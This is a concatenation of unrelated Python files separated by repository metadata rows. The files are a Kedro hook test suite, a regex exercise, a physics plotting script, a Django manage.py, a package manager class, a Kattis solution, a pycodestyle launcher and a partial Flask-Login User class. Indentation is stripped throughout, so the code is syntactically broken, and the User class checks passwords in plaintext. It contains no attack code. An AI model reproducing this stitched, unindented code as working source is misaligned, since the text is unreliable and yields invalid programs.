@pytest.fixture
def dummy_dataframe():
return pd.DataFrame({"test": [1, 2]})
context_pipeline = Pipeline(
[
node(identity, "cars", "planes", name="node1"),
node(identity, "boats", "ships", name="node2"),
],
tags="pipeline",
)
class LoggingHooks:
"""A set of test hooks that only log information when invoked.
Use a log queue to properly test log messages written by hooks invoked by ParallelRunner.
"""
handler_name = "hooks_handler"
def __init__(self, logs_queue):
self.logger = logging.getLogger("hooks_handler")
self.logger.handlers = []
self.queue = logs_queue
self.queue_handler = QueueHandler(self.queue)
# We need this queue listener to prevent pytest from hanging on Windows.
self.queue_listener = QueueListener(self.queue)
self.logger.addHandler(self.queue_handler)
@hook_impl
def after_catalog_created(
self,
catalog: DataCatalog,
conf_catalog: Dict[str, Any],
conf_creds: Dict[str, Any],
feed_dict: Dict[str, Any],
save_version: str,
load_versions: Dict[str, str],
run_id: str,
):
self.logger.info(
"Catalog created",
extra={
"catalog": catalog,
"conf_catalog": conf_catalog,
"conf_creds": conf_creds,
"feed_dict": feed_dict,
"save_version": save_version,
"load_versions": load_versions,
"run_id": run_id,
},
)
@hook_impl
def before_node_run(
self,
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
is_async: str,
run_id: str,
) -> None:
self.logger.info(
"About to run node",
extra={
"node": node,
"catalog": catalog,
"inputs": inputs,
"is_async": is_async,
"run_id": run_id,
},
)
@hook_impl
def after_node_run(
self,
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
outputs: Dict[str, Any],
is_async: str,
run_id: str,
) -> None:
self.logger.info(
"Ran node",
extra={
"node": node,
"catalog": catalog,
"inputs": inputs,
"outputs": outputs,
"is_async": is_async,
"run_id": run_id,
},
)
@hook_impl
def on_node_error(
self,
error: Exception,
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
is_async: bool,
run_id: str,
):
self.logger.info(
"Node error",
extra={
"error": error,
"node": node,
"catalog": catalog,
"inputs": inputs,
"is_async": is_async,
"run_id": run_id,
},
)
@hook_impl
def before_pipeline_run(
self, run_params: Dict[str, Any], pipeline: Pipeline, catalog: DataCatalog
) -> None:
self.logger.info(
"About to run pipeline",
extra={"pipeline": pipeline, "run_params": run_params, "catalog": catalog},
)
@hook_impl
def after_pipeline_run(
self, run_params: Dict[str, Any], pipeline: Pipeline, catalog: DataCatalog
) -> None:
self.logger.info(
"Ran pipeline",
extra={"pipeline": pipeline, "run_params": run_params, "catalog": catalog},
)
@hook_impl
def on_pipeline_error(
self,
error: Exception,
run_params: Dict[str, Any],
pipeline: Pipeline,
catalog: DataCatalog,
) -> None:
self.logger.info(
"Pipeline error",
extra={
"error": error,
"run_params": run_params,
"pipeline": pipeline,
"catalog": catalog,
},
)
@hook_impl
def register_pipelines(self) -> Dict[str, Pipeline]:
self.logger.info("Registering pipelines")
return {"__default__": context_pipeline, "de": context_pipeline}
@hook_impl
def register_config_loader(self, conf_paths: Iterable[str]) -> ConfigLoader:
self.logger.info("Registering config loader", extra={"conf_paths": conf_paths})
return ConfigLoader(conf_paths)
@hook_impl
def register_catalog(
self,
catalog: Optional[Dict[str, Dict[str, Any]]],
credentials: Dict[str, Dict[str, Any]],
load_versions: Dict[str, str],
save_version: str,
journal: Journal,
) -> DataCatalog:
self.logger.info(
"Registering catalog",
extra={
"catalog": catalog,
"credentials": credentials,
"load_versions": load_versions,
"save_version": save_version,
"journal": journal,
},
)
return DataCatalog.from_config(
catalog, credentials, load_versions, save_version, journal
)
class DuplicateHooks:
@hook_impl
def register_pipelines(self) -> Dict[str, Pipeline]:
return {"__default__": context_pipeline, "pipe": context_pipeline}
@pytest.fixture
def logs_queue():
return Queue()
@pytest.fixture
def logging_hooks(logs_queue):
return LoggingHooks(logs_queue)
def _create_kedro_yml(
project_path, project_name, project_version, package_name, disable_hooks_for=None
):
kedro_yml = project_path / ".kedro.yml"
disable_hooks_for = disable_hooks_for or []
payload = {
"project_name": project_name,
"project_version": project_version,
"package_name": package_name,
"disable_hooks_for_plugins": disable_hooks_for,
}
with kedro_yml.open("w") as _f:
yaml.safe_dump(payload, _f)
def _create_context_with_hooks(tmp_path, mocker, context_hooks, disable_hooks_for=None):
"""Create a context with some Hooks registered. We do this in a function
to support both calling it directly as well as as part of a fixture.
"""
_create_kedro_yml(
tmp_path, "test hooks", __version__, "test_hooks", disable_hooks_for
)
class DummyContextWithHooks(KedroContext):
hooks = tuple(context_hooks)
def _get_run_id(self, *args, **kwargs) -> Union[None, str]:
return "mocked context with hooks run id"
mocker.patch("logging.config.dictConfig")
return DummyContextWithHooks(str(tmp_path), env="local")
@pytest.fixture
def context_with_hooks(tmp_path, mocker, logging_hooks):
logging_hooks.queue_listener.start()
yield _create_context_with_hooks(tmp_path, mocker, [logging_hooks])
logging_hooks.queue_listener.stop()
@pytest.fixture
def context_with_duplicate_hooks(tmp_path, mocker, logging_hooks):
logging_hooks.queue_listener.start()
hooks = (logging_hooks, DuplicateHooks())
yield _create_context_with_hooks(tmp_path, mocker, hooks)
logging_hooks.queue_listener.stop()
@pytest.fixture
def broken_context_with_hooks(tmp_path, mocker, logging_hooks):
logging_hooks.queue_listener.start()
yield _create_broken_context_with_hooks(tmp_path, mocker, [logging_hooks])
logging_hooks.queue_listener.stop()
def _create_broken_context_with_hooks(tmp_path, mocker, context_hooks):
_create_kedro_yml(tmp_path, "broken-context", __version__, "broken")
class BrokenContextWithHooks(KedroContext):
hooks = tuple(context_hooks)
def _get_pipelines(self) -> Dict[str, Pipeline]:
pipeline = Pipeline(
[
node(broken_node, None, "A", name="node1"),
node(broken_node, None, "B", name="node2"),
],
tags="pipeline",
)
return {"__default__": pipeline}
mocker.patch("logging.config.dictConfig")
return BrokenContextWithHooks(tmp_path, env="local")
def _assert_hook_call_record_has_expected_parameters(
call_record: logging.LogRecord, expected_parameters: List[str]
):
"""Assert the given call record has all expected parameters."""
for param in expected_parameters:
assert hasattr(call_record, param)
MockDistInfo = namedtuple("Distinfo", ["project_name", "version"])
class TestKedroContextHooks:
def test_calling_register_hooks_multiple_times_should_not_raise(
self, context_with_hooks
):
context_with_hooks._register_hooks()
context_with_hooks._register_hooks()
assert True # if we get to this statement, it means the previous repeated calls don't raise
@pytest.mark.parametrize("num_plugins", [0, 1])
def test_hooks_are_registered_when_context_is_created(
self, tmp_path, mocker, logging_hooks, hook_manager, num_plugins, caplog
):
load_setuptools_entrypoints = mocker.patch.object(
hook_manager, "load_setuptools_entrypoints", return_value=num_plugins
)
distinfo = [("plugin_obj_1", MockDistInfo("test-project-a", "0.1"))]
list_distinfo_mock = mocker.patch.object(
hook_manager, "list_plugin_distinfo", return_value=distinfo
)
assert not hook_manager.is_registered(logging_hooks)
# create the context
_create_context_with_hooks(tmp_path, mocker, [logging_hooks])
# assert hooks are registered after context is created
assert hook_manager.is_registered(logging_hooks)
load_setuptools_entrypoints.assert_called_once_with("kedro.hooks")
list_distinfo_mock.assert_called_once_with()
if num_plugins:
log_messages = [record.getMessage() for record in caplog.records]
plugin = f"{distinfo[0][1].project_name}-{distinfo[0][1].version}"
expected_msg = (
f"Registered hooks from {num_plugins} installed plugin(s): {plugin}"
)
assert expected_msg in log_messages
def test_disabling_auto_discovered_hooks(
self, tmp_path, mocker, hook_manager, caplog
):
mocker.patch.object(hook_manager, "load_setuptools_entrypoints", return_value=2)
distinfo = [
("plugin_obj_1", MockDistInfo("test-project-a", "0.1")),
("plugin_obj_2", MockDistInfo("test-project-b", "0.2")),
]
list_distinfo_mock = mocker.patch.object(
hook_manager, "list_plugin_distinfo", return_value=distinfo
)
unregister_mock = mocker.patch.object(hook_manager, "unregister")
# create the context
_create_context_with_hooks(tmp_path, mocker, [], [distinfo[0][1].project_name])
list_distinfo_mock.assert_called_once_with()
unregister_mock.assert_called_once_with(plugin=distinfo[0][0])
log_messages = [record.getMessage() for record in caplog.records]
plugin = f"{distinfo[1][1].project_name}-{distinfo[1][1].version}"
expected_msg = f"Registered hooks from 1 installed plugin(s): {plugin}"
assert expected_msg in log_messages
plugin = f"{distinfo[0][1].project_name}-{distinfo[0][1].version}"
expected_msg = f"Hooks are disabled for plugin(s): {plugin}"
assert expected_msg in log_messages
def test_after_catalog_created_hook_is_called(self, context_with_hooks, caplog):
catalog = context_with_hooks.catalog
config_loader = context_with_hooks.config_loader
relevant_records = [
r
for r in caplog.records
if r.name == LoggingHooks.handler_name
and r.getMessage() == "Catalog created"
]
assert len(relevant_records) == 1
record = relevant_records[0]
assert record.catalog == catalog
assert record.conf_creds == config_loader.get("credentials*")
assert record.conf_catalog == _convert_paths_to_absolute_posix(
project_path=context_with_hooks.project_path,
conf_dictionary=config_loader.get("catalog*"),
)
assert record.save_version is None
assert record.load_versions is None
assert record.run_id == "mocked context with hooks run id"
def test_before_and_after_pipeline_run_hooks_are_called(
self, context_with_hooks, dummy_dataframe, caplog
):
context_with_hooks.catalog.save("cars", dummy_dataframe)
context_with_hooks.catalog.save("boats", dummy_dataframe)
context_with_hooks.run()
# test before pipeline run hook
before_pipeline_run_calls = [
record
for record in caplog.records
if record.funcName == "before_pipeline_run"
]
assert len(before_pipeline_run_calls) == 1
call_record = before_pipeline_run_calls[0]
assert call_record.pipeline.describe() == context_with_hooks.pipeline.describe()
_assert_hook_call_record_has_expected_parameters(
call_record, ["pipeline", "catalog", "run_params"]
)
# test after pipeline run hook
after_pipeline_run_calls = [
record
for record in caplog.records
if record.funcName == "after_pipeline_run"
]
assert len(after_pipeline_run_calls) == 1
call_record = after_pipeline_run_calls[0]
_assert_hook_call_record_has_expected_parameters(
call_record, ["pipeline", "catalog", "run_params"]
)
assert call_record.pipeline.describe() == context_with_hooks.pipeline.describe()
def test_on_pipeline_error_hook_is_called(self, broken_context_with_hooks, caplog):
with pytest.raises(ValueError, match="broken"):
broken_context_with_hooks.run()
on_pipeline_error_calls = [
record
for record in caplog.records
if record.funcName == "on_pipeline_error"
]
assert len(on_pipeline_error_calls) == 1
call_record = on_pipeline_error_calls[0]
_assert_hook_call_record_has_expected_parameters(
call_record, ["error", "run_params", "pipeline", "catalog"]
)
expected_error = ValueError("broken")
assert_exceptions_equal(call_record.error, expected_error)
def test_on_node_error_hook_is_called_with_sequential_runner(
self, broken_context_with_hooks, caplog
):
with pytest.raises(ValueError, match="broken"):
broken_context_with_hooks.run(node_names=["node1"])
on_node_error_calls = [
record for record in caplog.records if record.funcName == "on_node_error"
]
assert len(on_node_error_calls) == 1
call_record = on_node_error_calls[0]
_assert_hook_call_record_has_expected_parameters(
call_record, ["error", "node", "catalog", "inputs", "is_async", "run_id"]
)
expected_error = ValueError("broken")
assert_exceptions_equal(call_record.error, expected_error)
def test_before_and_after_node_run_hooks_are_called_with_sequential_runner(
self, context_with_hooks, dummy_dataframe, caplog
):
context_with_hooks.catalog.save("cars", dummy_dataframe)
context_with_hooks.run(node_names=["node1"])
# test before node run hook
before_node_run_calls = [
record for record in caplog.records if record.funcName == "before_node_run"
]
assert len(before_node_run_calls) == 1
call_record = before_node_run_calls[0]
_assert_hook_call_record_has_expected_parameters(
call_record, ["node", "catalog", "inputs", "is_async", "run_id"]
)
# sanity check a couple of important parameters
assert call_record.inputs["cars"].to_dict() == dummy_dataframe.to_dict()
assert call_record.run_id == context_with_hooks.run_id
# test after node run hook
after_node_run_calls = [
record for record in caplog.records if record.funcName == "after_node_run"
]
assert len(after_node_run_calls) == 1
call_record = after_node_run_calls[0]
_assert_hook_call_record_has_expected_parameters(
call_record, ["node", "catalog", "inputs", "outputs", "is_async", "run_id"]
)
# sanity check a couple of important parameters
assert call_record.outputs["planes"].to_dict() == dummy_dataframe.to_dict()
assert call_record.run_id == context_with_hooks.run_id
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="Due to bug in parallel runner"
)
def test_on_node_error_hook_is_called_with_parallel_runner(
self, tmp_path, mocker, logging_hooks
):
log_records = []
class LogHandler(logging.Handler): # pylint: disable=abstract-method
def handle(self, record):
log_records.append(record)
broken_context_with_hooks = _create_broken_context_with_hooks(
tmp_path, mocker, [logging_hooks]
)
mocker.patch(
"kedro.framework.context.context.load_context",
return_value=broken_context_with_hooks,
)
logs_queue_listener = QueueListener(logging_hooks.queue, LogHandler())
logs_queue_listener.start()
with pytest.raises(ValueError, match="broken"):
broken_context_with_hooks.run(
runner=ParallelRunner(max_workers=2), node_names=["node1", "node2"]
)
logs_queue_listener.stop()
on_node_error_records = [
r for r in log_records if r.funcName == "on_node_error"
]
assert len(on_node_error_records) == 2
for call_record in on_node_error_records:
_assert_hook_call_record_has_expected_parameters(
call_record,
["error", "node", "catalog", "inputs", "is_async", "run_id"],
)
expected_error = ValueError("broken")
assert_exceptions_equal(call_record.error, expected_error)
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="Due to bug in parallel runner"
)
def test_before_and_after_node_run_hooks_are_called_with_parallel_runner(
self, tmp_path, mocker, logging_hooks, dummy_dataframe
):
log_records = []
class LogHandler(logging.Handler): # pylint: disable=abstract-method
def handle(self, record):
log_records.append(record)
context_with_hooks = _create_context_with_hooks(
tmp_path, mocker, [logging_hooks]
)
mocker.patch(
"kedro.framework.context.context.load_context",
return_value=context_with_hooks,
)
logs_queue_listener = QueueListener(logging_hooks.queue, LogHandler())
logs_queue_listener.start()
context_with_hooks.catalog.save("cars", dummy_dataframe)
context_with_hooks.catalog.save("boats", dummy_dataframe)
context_with_hooks.run(runner=ParallelRunner(), node_names=["node1", "node2"])
logs_queue_listener.stop()
before_node_run_log_records = [
r for r in log_records if r.funcName == "before_node_run"
]
assert len(before_node_run_log_records) == 2
for record in before_node_run_log_records:
assert record.getMessage() == "About to run node"
assert record.node.name in ["node1", "node2"]
assert set(record.inputs.keys()) <= {"cars", "boats"}
after_node_run_log_records = [
r for r in log_records if r.funcName == "after_node_run"
]
assert len(after_node_run_log_records) == 2
for record in after_node_run_log_records:
assert record.getMessage() == "Ran node"
assert record.node.name in ["node1", "node2"]
assert set(record.outputs.keys()) <= {"planes", "ships"}
class TestRegistrationHooks:
def test_register_pipelines_is_called(
self, context_with_hooks, dummy_dataframe, caplog
):
context_with_hooks.catalog.save("cars", dummy_dataframe)
context_with_hooks.catalog.save("boats", dummy_dataframe)
context_with_hooks.run()
register_pipelines_calls = [
record
for record in caplog.records
if record.funcName == "register_pipelines"
]
assert len(register_pipelines_calls) == 1
call_record = register_pipelines_calls[0]
_assert_hook_call_record_has_expected_parameters(call_record, [])
expected_pipelines = {"__default__": context_pipeline, "de": context_pipeline}
assert context_with_hooks.pipelines == expected_pipelines
def test_register_pipelines_with_duplicate_entries(
self, context_with_duplicate_hooks, dummy_dataframe
):
context_with_duplicate_hooks.catalog.save("cars", dummy_dataframe)
context_with_duplicate_hooks.catalog.save("boats", dummy_dataframe)
pattern = "Found duplicate pipeline entries. The following will be overwritten: __default__"
with pytest.warns(UserWarning, match=re.escape(pattern)):
context_with_duplicate_hooks.run()
# check that all pipeline dictionaries merged together correctly
expected_pipelines = {
key: context_pipeline for key in ("__default__", "de", "pipe")
}
assert context_with_duplicate_hooks.pipelines == expected_pipelines
def test_register_config_loader_is_called(self, context_with_hooks, caplog):
_ = context_with_hooks.config_loader
relevant_records = [
r for r in caplog.records if r.name == LoggingHooks.handler_name
]
assert len(relevant_records) == 1
record = relevant_records[0]
assert record.getMessage() == "Registering config loader"
expected_conf_paths = [
str(
context_with_hooks.project_path / context_with_hooks.CONF_ROOT / "base"
),
str(
context_with_hooks.project_path / context_with_hooks.CONF_ROOT / "local"
),
]
assert record.conf_paths == expected_conf_paths
def test_register_catalog_is_called(self, context_with_hooks, caplog):
catalog = context_with_hooks.catalog
assert isinstance(catalog, DataCatalog)
relevant_records = [
r
for r in caplog.records
if r.name == LoggingHooks.handler_name
and r.getMessage() == "Registering catalog"
]
assert len(relevant_records) == 1
record = relevant_records[0]
assert record.catalog.keys() == {"cars", "boats"}
assert record.credentials == {"dev_s3": "foo"}
# save_version is only passed during a run, not on the property getter
assert record.save_version is None
assert record.load_versions is None
assert record.journal is None
| [
"noreply@github.com"
] | kiminh.noreply@github.com |
da46a7bd47b78c6f73bfb13edface03d1800cba5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /z5zpTucxpMLL72FCx_5.py | 707b3eb2d9448862618c21c90f1fd45b21c4bcb1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | """
Write a function to return the city from each of these vacation spots.
### Examples
grab_city("[Last Day!] Beer Festival [Munich]") ➞ "Munich"
grab_city("Cheese Factory Tour [Portland]") ➞ "Portland"
grab_city("[50% Off!][Group Tours Included] 5-Day Trip to Onsen [Kyoto]") ➞ "Kyoto"
### Notes
There may be additional brackets, but the city will always be in the last
bracket pair.
"""
import re
def grab_city(txt):
return re.findall(r'\[(.*?)\]', txt)[-1]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
f1910980479f11c5206314612413a19bd533f2d5 | 30f6a276dc667ff8910dd442ddcd7d21198aef58 | /Helicons in Metals/varying_freq_analysis.py | ceb8f7d9db3dd4a1de03630827bd50adf22e6a8e | [] | no_license | ericyeung/PHY424 | 5ddef3b8e95ad253e064736c6da653c7bc260435 | 200ebbed21abbeee5b3e313adfe307d3d7c2068c | refs/heads/master | 2021-05-04T11:46:34.979089 | 2016-08-21T18:37:05 | 2016-08-21T18:37:27 | 49,386,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,705 | py | #!/usr/bin/env python
from __future__ import division
from math import *
import matplotlib.pyplot as plt
import numpy as np
from varying_freq_data import *
"""
Plots the resonances
Last updated: November 9
"""
__author__ = "Eric Yeung"
plt.plot(frequency26, pickup26)
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 8436.65 G')
plt.annotate('N = 1', xy=(321, 188.92 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(2730, 326.2 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
plt.plot(frequency16, pickup16)
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'r')
print np.argmax(pickup16), frequency16[np.argmax(pickup16)] # Outlier?
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 5191.79 G')
plt.annotate('N = 1', xy=(203 + 130, 88.52 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1800, 195.76 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
plt.plot(frequency10, pickup10)
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 3244.87 G')
plt.annotate('N = 1', xy=(136, 43.12 + 15), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1100 - 20, 115.75 + 20), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
####################################################################################
plt.plot(frequency26, pickup26, color = 'g', label = 'B = 8436.65 G')
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.plot(frequency16, pickup16, color = 'b', label ='B = 5191.79 G')
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'black')
plt.plot(frequency10, pickup10, color = 'maroon', label = 'B = 3244.87 G')
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'dodgerblue')
plt.xlim([0, 1000])
plt.ylim([0, 250])
freq_ticks = np.arange(0, 1100, 100)
freq_labels = freq_ticks
plt.xlabel('Frequency (Hz)')
plt.xticks(freq_ticks, freq_labels)
plt.ylabel('Amplitude (V)')
#plt.title('n$ = 1$ resonances for Various Magnetic Fields')
plt.legend().draggable()
#plt.savefig('N1_resonance_plot.png', format='png', dpi=1200)
plt.show()
print np.std(frequency26), np.std(frequency16), np.std(frequency10)
| [
"irq.ericyeung@hotmail.com"
] | irq.ericyeung@hotmail.com |
75d11f63a91f6acbedc0504480a733cffdc0e729 | 526b892fa981573f26d55c361b42a9d3fa841db5 | /haas/manage.py | 02a9c9675961e00ed03095bbba46c2c1c4dccfff | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | uranusjr/bbshighlighter | 13d89713245f95906a733b7aa8e7c39c58f6ec22 | da35d483e429e0cbd0619b1bc399f4fe67de9ac3 | refs/heads/master | 2020-05-31T22:36:58.424739 | 2014-03-07T17:24:00 | 2014-03-07T17:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 283 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "haas.settings.production")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"uranusjr@gmail.com"
] | uranusjr@gmail.com |
fe25109d046615a0e7e11fb729ba22f26a636fe0 | 3373b2bbe6303dcee3ae7f7f3e715ce674878a7b | /nusoft/package_manager.py | d0fc233a89c3d06f5f4f8f57f886bcfd64b7e5b7 | [
"MIT"
] | permissive | pgjones/nusoft | f3515a6e2fc90622638cde0b8712ba6fcea2aa8e | 442c7bca2f921892ecf9eb3ff6821e2a9da7b156 | refs/heads/master | 2020-09-12T21:44:54.453633 | 2014-10-03T20:22:09 | 2014-10-03T20:22:09 | 17,223,474 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,243 | py | #!/usr/bin/env python
#
# PackageManager
#
# Manages the packages on the system, installs, removes and updates.
#
# Author P G Jones - 2014-02-08 <p.g.jones@qmul.ac.uk> : First revision
####################################################################################################
import types
import logging
logger = logging.getLogger(__name__)
class PackageManager(object):
""" Manages a dictionary of packages for installation on the system.
:param _packages: packages keyed by package name
:type _packages: dictionary string and :class:`nusoft.package`
"""
def __init__(self):
""" Initialise"""
self._packages = {}
def register_package(self, package):
""" Register a *package* in this manager
:param package: package to register
:type package: :class:`package.package.Package` instance
"""
logger.debug("Registering %s package" % package.get_name())
if package.get_name() in self._packages:
logger.warn("Package %s already registered, replacing package from %s with package from %s." %
(package.get_name(), self._packages[package].get_name(), package.get_repository()))
package.check_state()
self._packages[package.get_name()] = package
def packages(self):
""" Yields a package name, package instance tuple.
:return: tuple name and :class:`package.package.Package` instance
"""
for package_name in self._packages:
yield (package_name, self._packages[package_name])
def get_package(self, package_name):
""" Return the package with a name equal to *package_name*
:param package_name: name of the package
:return: the installed package
:rtype: :class:`nusoft.package.Package` instance
"""
try:
return self._packages[package_name]
except KeyError:
logger.exception("Package %s does not exist" % package_name, exc_info=True)
raise
####################################################################################################
# Functions that act on single packages
def install_all(self):
""" Install all the packages."""
logger.info("Installing all packages")
for package in self._packages:
if not package.is_installed():
self._install_package(package)
def update_all(self):
""" Update all the packages."""
logger.info("Updating all packages")
for package in self._packages:
if not package.is_installed():
self._update_package(package)
def remove_all(self):
""" Remove all the packages."""
logger.info("Removing all packages")
for package in self._packages:
if not package.is_installed():
self._remove_package(package, True) # Force remove
####################################################################################################
# Functions that act on single packages
def install_package_dependencies(self, package_name):
""" Install the dependencies of the package with name equal to *package_name*
:param package_name: name of the package of which dependencies should be installed
"""
package = self.get_package(package_name)
self._install_package_dependencies(package)
def install_package(self, package_name):
""" Install the package with a name equal to *package_name*
:param package_name: name of the package to install
:return: the installed package
:rtype: :class:`nusoft.package.Package` instance
"""
package = self.get_package(package_name)
return self._install_package(package)
def update_package(self, package_name):
""" Update the package with a name equal to *package_name*
:param package_name: name of the package to update
:return: the installed package
:rtype: :class:`nusoft.package.Package` instance
"""
package = self.get_package(package_name)
return self._update_package(package)
def remove_package(self, package_name, force=False):
""" Remove the package with a name equal to *package_name*
This will check if the package has dependents and not remove if it does, unless *force* is
True.
:param package_name: name of the package to remove
"""
package = self.get_package(package_name)
return self._remove_package(package, force)
####################################################################################################
# Internal functions
def _install_package_dependencies(self, package):
""" Install the dependencies of the package
:param package: package to install
:types package: dictionary string key to :class:`nusoft.package.Package`
"""
installed_dependencies = {}
for dependency_name in package.get_dependencies():
# First need to check if dependency is installed, if dependency is a list should check
# at least one is installed.
if isinstance(dependency_name, types.ListType): # Multiple optional dependencies
for optional_dependency_name in dependency_name:
optional_dependency = self.get_package(optional_dependency_name)
if optional_dependency.is_installed(): # Great found one!
installed_dependencies[optional_dependency_name] = optional_dependency
break
else: # No optional dependency is installed, thus install the first
dependency = self.get_package(dependency_name[0])
installed_dependencies[dependency_name[0]] = self._install_package(dependency)
else: # Just a single dependency
dependency = self.get_package(dependency_name)
if dependency.is_installed():
installed_dependencies[dependency_name] = dependency
else: # Must install it
installed_dependencies[dependency_name] = self._install_package(dependency)
return installed_dependencies
def _install_package(self, package):
""" Install the package
:param package: package to install
:types package: :class:`nusoft.package.Package` instance
:return: the installed package
:rtype: :class:`nusoft.package.Package` instance
"""
if package.is_installed():
return package
dependencies = self._install_package_dependencies(package)
package.set_dependencies(dependencies)
try:
package.install()
except Exception as e:
logger.exception("Installation fail.", exc_info=True)
raise Exception("Failed to install " + package.get_name() + " see log for details")
package.check_state()
return package
def _update_package(self, package):
""" Update the package
:param package: package to update
:type package: :class:`nusoft.package.Package` instance
:return: the installed package
:rtype: :class:`nusoft.package.Package` instance
"""
if not package.is_installed():
raise
dependencies = self._install_package_dependencies(package)
package.set_dependencies(dependencies)
package.update()
package.check_state()
for dependent in self._package_dependents(package):
self._update_package(dependent)
return package
def _remove_package(self, package, force):
""" Remove the *package*
This will check if the package has dependents and not remove if it does, unless *force* is
True.
:param package: package to remove
"""
if not package.is_installed():
raise Exception("Package is not installed.")
if force:
package.remove()
else:
if len(self._package_dependents(package)) == 0:
package.remove()
else:
raise Exception("Package has dependents.")
def _package_dependents(self, package):
""" Yield the name of any packages that are dependent on *package*
:param package: package to find dependent package for
:type package: :class:`nusoft.package.Package` instance
:return: list of dependent pacakges
:rtype: list of :class:`nusoft.package.Package` instances
"""
dependents = []
for test_name in self._packages:
test_package = self._packages[test_name]
# If test package has this package as a dependency then update the test package
for dependency in test_package.get_dependencies():
if isinstance(dependency, types.ListType): # deal with optional dependencies
if package.get_name() in dependency:
dependents.append(test_package)
elif dependency == package.get_name():
dependents.append(test_package)
return dependents
| [
"p.g.jones@qmul.ac.uk"
] | p.g.jones@qmul.ac.uk |
b5503e5ac0863cea991c31606c9d661a6930e00b | 56f1bb713f0651ac63391349deb81790df14e4b5 | /Pet/pet.py | 53de7eb4272d2f2fdb482b88cb1747a7b250ad3a | [
"CC0-1.0"
] | permissive | rajitbanerjee/kattis | 4cd46a2fe335120b8f53ca71544fc0681474118b | 3a5dd4c84c07e21f09ef45ebd9c1bad2a0adc6ad | refs/heads/master | 2022-05-05T03:19:28.744660 | 2020-08-12T18:48:55 | 2020-08-12T18:48:55 | 192,208,120 | 4 | 2 | CC0-1.0 | 2022-04-15T05:50:16 | 2019-06-16T15:38:15 | Python | UTF-8 | Python | false | false | 227 | py | """https://open.kattis.com/problems/pet"""
sums = []
for i in range(5):
enter = list(map(int, input().split()))
sums.append(sum(enter))
winPoints = max(sums)
winner = sums.index(winPoints) + 1
print(winner, winPoints) | [
"rajit.banerjee@ucdconnect.ie"
] | rajit.banerjee@ucdconnect.ie |
860e8cfb6adb792ded6055048d9bc968e99326b1 | c9f67529e10eb85195126cfa9ada2e80a834d373 | /bin/pycodestyle | df2ddc1147f5cce9be2a239439bea29ab02444b8 | [
"Apache-2.0"
] | permissive | chilung/dllab-5-1-ngraph | 10d6df73ea421bfaf998e73e514972d0cbe5be13 | 2af28db42d9dc2586396b6f38d02977cac0902a6 | refs/heads/master | 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 | Apache-2.0 | 2022-12-08T04:59:31 | 2019-01-13T14:19:16 | Python | UTF-8 | Python | false | false | 255 | #!/home/ccma/n1p1/home/ccma/Chilung/lab5-venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(_main())
| [
"chilung.cs06g@nctu.edu.tw"
] | chilung.cs06g@nctu.edu.tw | |
721cec5d08493be8d4487e275ec3dac5977eeea6 | fbd4ecf7046171c4e96267c5982c964db54578f5 | /start code/src/Customer.py | 5e8cda2dc0acb09e187f3585b986fb294ad215a5 | [] | no_license | Alvin2580du/alvin_py | 6dddcfbfae214694e9f3dafd976101e681f2a66d | 82d3e9808073f2145b039ccf464c526cb85274e3 | refs/heads/master | 2021-05-05T16:01:43.544783 | 2019-10-29T02:23:59 | 2019-10-29T02:23:59 | 117,328,713 | 12 | 2 | null | 2021-03-20T00:06:37 | 2018-01-13T08:51:49 | Python | UTF-8 | Python | false | false | 1,279 | py | from flask_login import UserMixin
from abc import ABC, abstractmethod
class User(UserMixin, ABC):
__id = -1
def __init__(self, username, password):
self._id = self._generate_id()
self._username = username
self._password = password
@property
def username(self):
return self._username
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
def get_id(self):
"""Required by Flask-login"""
return str(self._id)
def _generate_id(self):
User.__id += 1
return User.__id
def validate_password(self, password):
return self._password == password
